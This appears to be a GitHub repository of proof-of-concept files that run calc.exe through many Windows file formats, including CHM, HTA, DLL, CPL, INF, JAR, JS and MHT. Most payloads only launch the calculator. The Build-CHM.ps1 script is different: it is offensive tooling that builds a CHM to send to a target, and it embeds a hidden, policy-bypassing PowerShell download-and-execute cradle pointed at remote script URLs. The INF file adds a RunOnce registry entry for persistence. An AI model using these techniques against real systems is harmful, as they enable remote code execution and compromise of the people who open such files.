├── README.md
├── bat
    └── calc.bat
├── chm
    ├── Build-CHM.ps1
    ├── calc.chm
    ├── calc.hhc
    ├── calc.hhp
    └── calc.htm
├── cmd
    └── calc.cmd
├── cpl
    ├── calc.cpl
    └── calc.cpp
├── dll
    ├── calc.dll
    ├── calc.inf
    └── main.cpp
├── doc
    └── calc.doc
├── exe
    ├── calc.exe
    └── calc
    │   ├── calc.sln
    │   ├── calc.vcxproj
    │   ├── calc.vcxproj.filters
    │   └── main.cpp
├── hta
    └── calc.hta
├── html
    └── calc.html
├── inf
    └── calc.inf
├── jar
    ├── HelloCalc.java
    ├── MANIFEST.MF
    └── calc.jar
├── js,jse
    ├── calc.js
    └── calc.jse
├── lnk
    └── calc.lnk
├── mht
    └── calc.mht
├── msi
    ├── calc.exe
    ├── calc.msi
    └── calc.wxs
├── pdf
    └── calc.pdf
├── pif
    └── calc.pif
├── ps1
    └── calc.ps1
├── reg
    └── calc.reg
├── scr
    └── calc.scr
├── vbe,vbs
    ├── calc.vbe
    └── calc.vbs
├── wsf
    └── calc.wsf
└── xls
    └── calc.xls


/README.md:
--------------------------------------------------------------------------------
1 | # calc_poc
2 | A repository holding Proof of Concepts for executing the calculator application via different file formats
3 | 
4 | This repo was deleted in the past and I found it helpful when I started learning so here it is up again, I don't remember the Original Author of this repo but I have this copy with me and wanted to share
5 | 


--------------------------------------------------------------------------------
/bat/calc.bat:
--------------------------------------------------------------------------------
1 | c:\windows\system32\calc.exe


--------------------------------------------------------------------------------
/chm/Build-CHM.ps1:
--------------------------------------------------------------------------------
  1 | 
  2 | function Out-CHM
  3 | {
  4 | 
  5 | <#
  6 | .SYNOPSIS
  7 | Nishang script modified for Kautilya, useful for creating Compiled HTML Help file (.CHM) which could be used to run PowerShell commands and scripts.
  8 | 
  9 | .DESCRIPTION
 10 | The script generates a CHM file which needs to be sent to a target.
 11 | You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
 12 | HTML Help Workshop is a free Microsoft Tool and could be downloaded from below link:
 13 | http://www.microsoft.com/en-us/download/details.aspx?id=21138
 14 | 
 15 | .PARAMETER Payload
 16 | Payload which you want execute on the target.
 17 | 
 18 | .PARAMETER PayloadURL
 19 | URL of the powershell script which would be executed on the target.
 20 | 
 21 | .PARAMETER Arguments
 22 | Arguments to the powershell script to be executed on the target.
 23 | 
 24 | .PARAMETER OutputPath
 25 | Path to the directory where the files would be saved. Default is the current directory.
 26 | 
 27 | .EXAMPLE
 28 | PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
 29 | 
 30 | Above command would execute Get-Process on the target machine when the CHM file is opened.
 31 | 
 32 | .EXAMPLE
 33 | PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
 34 | 
 35 | Use above command to generate CHM file which download and execute the given powershell script in memory on target.
 36 | 
 37 | .EXAMPLE
 38 | PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
 39 | 
 40 | Use above command to generate CHM file which executes the encoded command/script.
 41 | Use Invoke-Encode from Nishang to encode the command or script.
 42 | 
 43 | .EXAMPLE
 44 | PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
 45 | 
 46 | Use above command to pass an argument to the powershell script/module.
 47 | 
 48 | .LINK
 49 | http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
 50 | https://github.com/samratashok/nishang
 51 | 
 52 | .Notes
 53 | Based on the work mentioned in this tweet by @ithurricanept
 54 | https://twitter.com/ithurricanept/status/534993743196090368
 55 | #>
 56 | 
 57 | 
 58 | 
 59 |     [CmdletBinding()] Param(
 60 |         
 61 |         [Parameter(Position = 0, Mandatory = $False)]
 62 |         [String]
 63 |         $Payload,
 64 |         
 65 |         [Parameter(Position = 1, Mandatory = $False)]
 66 |         [String]
 67 |         $PayloadURL,
 68 | 
 69 |         [Parameter(Position = 2, Mandatory = $False)]
 70 |         [String]
 71 |         $Arguments,
 72 | 
 73 |         [Parameter(Position = 3, Mandatory = $True)]
 74 |         [String]
 75 |         $HHCPath,
 76 | 
 77 |         [Parameter(Position = 4, Mandatory = $False)]
 78 |         [String]
 79 |         $OutputPath="$pwd"
 80 |     )
 81 | 
 82 |     #Check if the payload has been provided by the user
 83 |     if(!$Payload)
 84 |     {
 85 |         $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
 86 |     }    
 87 | 
 88 |     #Create the table of contents for the CHM
 89 |     $CHMTableOfContents = @"
 90 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
 91 | <HTML>
 92 | <HEAD>
 93 | <meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
 94 | <!-- Sitemap 1.0 -->
 95 | </HEAD><BODY>
 96 |   <UL>
 97 |   <LI> <OBJECT type="text/sitemap">
 98 |       <param name="Name" value="IPv4 Advanced IP Settings Tab">
 99 |       <param name="Local" value="doc.htm">
100 |   </OBJECT>
101 |   </UL>
102 | </BODY>
103 | </HTML>
104 | "@
105 | 
106 |     #Create the Project file for the CHM
107 |     $CHMProject = @"
108 | [OPTIONS]
109 | Contents file=$OutputPath\doc.hhc
110 | [FILES]
111 | $OutputPath\doc.htm
112 | "@
113 |     #Create the HTM files, the first one controls the payload execution.
114 |     $CHMHTML1 = @"
115 | <HTML>
116 | <TITLE>Check for Windows updates from Command Line</TITLE>
117 | <HEAD>
118 | </HEAD>
119 | <BODY>
120 | 
121 | <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
122 | <PARAM name="Command" value="ShortCut">
123 |  <PARAM name="Button" value="Bitmap::shortcut">
124 |  <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile $Payload">
125 |  <PARAM name="Item2" value="273,1,1">
126 | </OBJECT>
127 | 
128 | <SCRIPT>
129 | x.Click();
130 | </SCRIPT>
131 | 
132 | 
133 | </BODY>
134 | </HTML>
135 | "@
136 | 
137 | 
138 |     #Write all files to disk for compilation
139 |     Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
140 |     Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
141 |     Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default
142 |     
143 |     #Compile the CHM, only this needs to be sent to a target.
144 |     $HHC = "$HHCPath" + "\hhc.exe"
145 |     & "$HHC" "$OutputPath\doc.hhp"
146 | 
147 |     #Cleanup
148 |     Remove-Item "$OutputPath\doc.hhc"
149 |     Remove-Item "$OutputPath\doc.htm"
150 |     Remove-Item "$OutputPath\doc.hhp"
151 | 
152 |     #Create a zip archive of the CHM file
153 |     $SourceFile = "$OutputPath\doc.chm"
154 |     $ZipFile = "$OutputPath\doc.zip"
155 |     #http://stackoverflow.com/questions/11021879/creating-a-zipped-compressed-folder-in-windows-using-powershell-or-the-command-l	
156 |     if(-not (test-path($ZipFile)))
157 |     {
158 | 	    Set-Content $ZipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))		
159 |     }
160 | 	
161 |     $shellApplication = new-object -com shell.application
162 |     $zippackage = $shellApplication.NameSpace($ZipFile)
163 |     $zippackage.copyhere($SourceFile)
164 |     
165 |     #Wait till zip archive is written to the disk
166 |     Start-Sleep -Seconds 3
167 | 
168 |     #Read the zip archive in bytes and write to a file
169 |     #Use this txt file in Kautilya with the Drop CHM file payload.
170 |     [byte[]] $FileContent = Get-Content -Encoding Byte $ZipFile
171 |     [System.IO.File]::WriteAllLines("$OutputPath\encodedchm.txt", $FileContent)
172 | 
173 |     #Cleanup
174 |     Remove-Item $SourceFile
175 |     Remove-Item $ZipFile
176 |     
177 | }


--------------------------------------------------------------------------------
/chm/calc.chm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/chm/calc.chm


--------------------------------------------------------------------------------
/chm/calc.hhc:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
 2 | <HTML>
 3 | <HEAD>
 4 | <meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
 5 | <!-- Sitemap 1.0 -->
 6 | </HEAD><BODY>
 7 | <OBJECT type="text/site properties">
 8 | 	<param name="ImageType" value="Folder">
 9 | </OBJECT>
10 | <UL>
11 | 	<LI> <OBJECT type="text/sitemap">
12 | 		<param name="Name" value="Calc PoC">
13 | 		<param name="Local" value="calc.htm">
14 | 		</OBJECT>
15 | </UL>
16 | </BODY></HTML>
17 | 


--------------------------------------------------------------------------------
/chm/calc.hhp:
--------------------------------------------------------------------------------
 1 | [OPTIONS]
 2 | Compatibility=1.1 or later
 3 | Compiled file=calc.chm
 4 | Contents file=calc.hhc
 5 | Default topic=calc.htm
 6 | Display compile progress=No
 7 | Language=0x409 English (United States)
 8 | 
 9 | 
10 | [FILES]
11 | calc.htm
12 | 
13 | [INFOTYPES]
14 | 
15 | 


--------------------------------------------------------------------------------
/chm/calc.htm:
--------------------------------------------------------------------------------
 1 | <HTML>
 2 | <TITLE>Calc PoC</TITLE>
 3 | <HEAD>
 4 | </HEAD>
 5 | <BODY>
 6 | <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
 7 | <PARAM name="Command" value="ShortCut">
 8 | <PARAM name="Button" value="Bitmap::shortcut">
 9 | <PARAM name="Item1" value=",cmd.exe,/c calc ,">
10 | <PARAM name="Item2" value="273,1,1">
11 | </OBJECT>
12 | <script>
13 | x.Click();
14 | </SCRIPT>
15 | <A name=contents>
16 | <H2 align=center>Calc PoC</H2>
17 | </A>
18 | </BODY>
19 | </HTML>


--------------------------------------------------------------------------------
/cmd/calc.cmd:
--------------------------------------------------------------------------------
1 | c:\windows\system32\calc.exe


--------------------------------------------------------------------------------
/cpl/calc.cpl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/cpl/calc.cpl


--------------------------------------------------------------------------------
/cpl/calc.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <Windows.h>
 3 | 
 4 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID
 5 | 	lpReserved)
 6 | {
 7 | 	// malicious code
 8 | 	if (ul_reason_for_call == DLL_PROCESS_ATTACH)
 9 | 		system("c:\\windows\\system32\\calc.exe");
10 | 	
11 | 	return 0;
12 | }


--------------------------------------------------------------------------------
/dll/calc.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/dll/calc.dll


--------------------------------------------------------------------------------
/dll/calc.inf:
--------------------------------------------------------------------------------
 1 | [Version]
 2 | Signature = "$CHICAGO$"
 3 | Class=61883
 4 | ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
 5 | Provider=%Msft%
 6 | DriverVer=06/21/2006,6.1.7600.16385
 7 | 
 8 | [DestinationDirs]
 9 | DefaultDestDir = 1
10 | 
11 | [DefaultInstall]
12 | RegisterDlls = CmdSvr
13 | 
14 | [CmdSvr]
15 | 1,,calc.dll,1


--------------------------------------------------------------------------------
/dll/main.cpp:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <Windows.h>
 4 | 
 5 | #pragma comment( linker, "/export:DllCanUnloadNow=_DllCanUnloadNow@0" )
 6 | #pragma comment( linker, "/export:DllGetClassObject=_DllGetClassObject@12" )
 7 | #pragma comment( linker, "/export:DllRegisterServer=_DllRegisterServer@0" )
 8 | #pragma comment( linker, "/export:DllUnregisterServer=_DllUnregisterServer@0" )
 9 | 
10 | STDAPI DllCanUnloadNow(void)
11 | {
12 | 	return TRUE;
13 | }
14 | 
15 | STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID FAR* ppv)
16 | {
17 | 	return TRUE;
18 | }
19 | 
20 | STDAPI DllRegisterServer(void)
21 | {
22 | 	system("c:\\windows\\system32\\cmd.exe /C \"cmd.exe\"");
23 | 	return TRUE;
24 | }
25 | 
26 | STDAPI DllUnregisterServer(void)
27 | {
28 | 	return TRUE;
29 | }
30 | 
31 | BOOL APIENTRY DllMain(HANDLE hModule,
32 | 	DWORD  ul_reason_for_call,
33 | 	LPVOID lpReserved)
34 | {
35 | 	switch (ul_reason_for_call) {
36 | 	case DLL_PROCESS_ATTACH:
37 | 	case DLL_THREAD_ATTACH:
38 | 	case DLL_THREAD_DETACH:
39 | 	case DLL_PROCESS_DETACH:
40 | 	default:
41 | 		break;
42 | 	}
43 | 	return TRUE;
44 | }


--------------------------------------------------------------------------------
/doc/calc.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/doc/calc.doc


--------------------------------------------------------------------------------
/exe/calc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/exe/calc.exe


--------------------------------------------------------------------------------
/exe/calc/calc.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Express 14 for Windows Desktop
 4 | VisualStudioVersion = 14.0.23107.0
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "calc", "calc.vcxproj", "{EEC9FC66-A3C8-4460-B155-F27616A03640}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Debug|x64.Build.0 = Debug|x64
18 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Debug|x86.Build.0 = Debug|Win32
20 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Release|x64.ActiveCfg = Release|x64
21 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Release|x64.Build.0 = Release|x64
22 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Release|x86.ActiveCfg = Release|Win32
23 | 		{EEC9FC66-A3C8-4460-B155-F27616A03640}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | EndGlobal
29 | 


--------------------------------------------------------------------------------
/exe/calc/calc.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{EEC9FC66-A3C8-4460-B155-F27616A03640}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>calc</RootNamespace>
 25 |     <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
 26 |   </PropertyGroup>
 27 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 28 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 29 |     <ConfigurationType>Application</ConfigurationType>
 30 |     <UseDebugLibraries>true</UseDebugLibraries>
 31 |     <PlatformToolset>v140</PlatformToolset>
 32 |     <CharacterSet>Unicode</CharacterSet>
 33 |   </PropertyGroup>
 34 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 35 |     <ConfigurationType>Application</ConfigurationType>
 36 |     <UseDebugLibraries>false</UseDebugLibraries>
 37 |     <PlatformToolset>v140</PlatformToolset>
 38 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 39 |     <CharacterSet>Unicode</CharacterSet>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 42 |     <ConfigurationType>Application</ConfigurationType>
 43 |     <UseDebugLibraries>true</UseDebugLibraries>
 44 |     <PlatformToolset>v140</PlatformToolset>
 45 |     <CharacterSet>Unicode</CharacterSet>
 46 |   </PropertyGroup>
 47 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 48 |     <ConfigurationType>Application</ConfigurationType>
 49 |     <UseDebugLibraries>false</UseDebugLibraries>
 50 |     <PlatformToolset>v140</PlatformToolset>
 51 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 52 |     <CharacterSet>Unicode</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 55 |   <ImportGroup Label="ExtensionSettings">
 56 |   </ImportGroup>
 57 |   <ImportGroup Label="Shared">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 60 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 69 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 70 |   </ImportGroup>
 71 |   <PropertyGroup Label="UserMacros" />
 72 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 73 |     <LinkIncremental>true</LinkIncremental>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 76 |     <LinkIncremental>true</LinkIncremental>
 77 |   </PropertyGroup>
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 79 |     <LinkIncremental>false</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 82 |     <LinkIncremental>false</LinkIncremental>
 83 |   </PropertyGroup>
 84 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 85 |     <ClCompile>
 86 |       <PrecompiledHeader>
 87 |       </PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 98 |     <ClCompile>
 99 |       <PrecompiledHeader>
100 |       </PrecompiledHeader>
101 |       <WarningLevel>Level3</WarningLevel>
102 |       <Optimization>Disabled</Optimization>
103 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |     </ClCompile>
105 |     <Link>
106 |       <SubSystem>Console</SubSystem>
107 |       <GenerateDebugInformation>true</GenerateDebugInformation>
108 |     </Link>
109 |   </ItemDefinitionGroup>
110 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
111 |     <ClCompile>
112 |       <WarningLevel>Level3</WarningLevel>
113 |       <PrecompiledHeader>
114 |       </PrecompiledHeader>
115 |       <Optimization>MaxSpeed</Optimization>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
119 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
120 |     </ClCompile>
121 |     <Link>
122 |       <SubSystem>Console</SubSystem>
123 |       <GenerateDebugInformation>true</GenerateDebugInformation>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |     </Link>
127 |   </ItemDefinitionGroup>
128 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
129 |     <ClCompile>
130 |       <WarningLevel>Level3</WarningLevel>
131 |       <PrecompiledHeader>
132 |       </PrecompiledHeader>
133 |       <Optimization>MaxSpeed</Optimization>
134 |       <FunctionLevelLinking>true</FunctionLevelLinking>
135 |       <IntrinsicFunctions>true</IntrinsicFunctions>
136 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Console</SubSystem>
140 |       <GenerateDebugInformation>true</GenerateDebugInformation>
141 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
142 |       <OptimizeReferences>true</OptimizeReferences>
143 |     </Link>
144 |   </ItemDefinitionGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="main.cpp" />
147 |   </ItemGroup>
148 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
149 |   <ImportGroup Label="ExtensionTargets">
150 |   </ImportGroup>
151 | </Project>


--------------------------------------------------------------------------------
/exe/calc/calc.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/exe/calc/main.cpp:
--------------------------------------------------------------------------------
 1 | /* system example : DIR */
 2 | #include <stdio.h>
 3 | #include <stdlib.h>
 4 | 
 5 | int main()
 6 | {
 7 | 	system("c:/windows/system32/calc.exe");
 8 | 
 9 | 	return 0;
10 | }


--------------------------------------------------------------------------------
/hta/calc.hta:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | 	<title>Calc</title>
 4 | 	<script language="VBScript">
 5 | 		Sub RunProgram
 6 |             Set objShell = CreateObject("Wscript.Shell")
 7 |             objShell.Run "c:\windows\system32\calc.exe"
 8 | 			Self.Close
 9 |         End Sub
10 | 	</script>
11 | </head>
12 | <body onload="RunProgram">
13 |     <h1>PoC</h1>
14 | </body>
15 | </html>


--------------------------------------------------------------------------------
/html/calc.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <title>Calc PoC</title>
 4 | <meta http-equiv="X-UA-Compatible" content="IE=8" />
 5 | <script type="text/javascript">
 6 | function RunCalc()
 7 | {
 8 | 	var cmdShell = new ActiveXObject("WScript.Shell");
 9 | 	cmdShell.Run("c:\\Windows\\system32\\calc.exe", 1, true);
10 | }
11 | </script>
12 | </head>
13 | <body onload="RunCalc()">
14 | <h1>Calculator PoC</h1>
15 | </body>
16 | </html>


--------------------------------------------------------------------------------
/inf/calc.inf:
--------------------------------------------------------------------------------
 1 | ; DRIVER.INF
 2 | ; Copyright (c) Microsoft Corporation.  All rights reserved.
 3 |  
 4 | [Version]
 5 | Signature = "$CHICAGO$"
 6 | Class=61883
 7 | ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
 8 | Provider=%Msft%
 9 | DriverVer=06/21/2006,6.1.7600.16385
10 |  
11 | [DestinationDirs]
12 | DefaultDestDir = 1
13 |  
14 | [DefaultInstall]
15 | AddReg = CalcStart
16 | 
17 | [CalcStart]
18 | HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""


--------------------------------------------------------------------------------
/jar/HelloCalc.java:
--------------------------------------------------------------------------------
 1 | import java.lang.Runtime;
 2 | 
 3 | public class HelloCalc {
 4 |     public static void main(String[] args) {
 5 | 		try {
 6 | 			Runtime.getRuntime().exec("c:\\windows\\system32\\calc.exe");
 7 | 		} catch (Exception e) {
 8 | 		}
 9 |     }
10 | }
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/jar/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Main-Class: HelloCalc
2 | 


--------------------------------------------------------------------------------
/jar/calc.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/jar/calc.jar


--------------------------------------------------------------------------------
/js,jse/calc.js:
--------------------------------------------------------------------------------
1 | var oShell = new ActiveXObject("Shell.Application");
2 | oShell.ShellExecute("C:\\Windows\\system32\\calc.exe","","","open","1");


--------------------------------------------------------------------------------
/js,jse/calc.jse:
--------------------------------------------------------------------------------
1 | var oShell = new ActiveXObject("Shell.Application");
2 | oShell.ShellExecute("C:\\Windows\\system32\\calc.exe","","","open","1");


--------------------------------------------------------------------------------
/lnk/calc.lnk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/lnk/calc.lnk


--------------------------------------------------------------------------------
/mht/calc.mht:
--------------------------------------------------------------------------------
 1 | From: "Saved by Internet Explorer 11"
 2 | Subject: 
 3 | Date: Mon, 15 Apr 2019 16:08:57 -0400
 4 | MIME-Version: 1.0
 5 | Content-Type: text/html;
 6 | 	charset="iso-8859-1"
 7 | Content-Transfer-Encoding: 7bit
 8 | Content-Location: mhtml:file://C:\calc.mht
 9 | X-MimeOLE: Produced By Microsoft MimeOLE
10 | 
11 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
12 | <html>
13 | <head>
14 | 	<title>Calc</title>
15 | 	<script language="VBScript">
16 | 		Sub RunProgram
17 |             Set objShell = CreateObject("Wscript.Shell")
18 |             objShell.Run "c:\windows\system32\calc.exe"
19 |         End Sub
20 | 	</script>
21 | </head>
22 | <body onload="RunProgram">
23 |     <h1>PoC</h1>
24 | </body>
25 | </html>
26 | 


--------------------------------------------------------------------------------
/msi/calc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/msi/calc.exe


--------------------------------------------------------------------------------
/msi/calc.msi:
--------------------------------------------------------------------------------
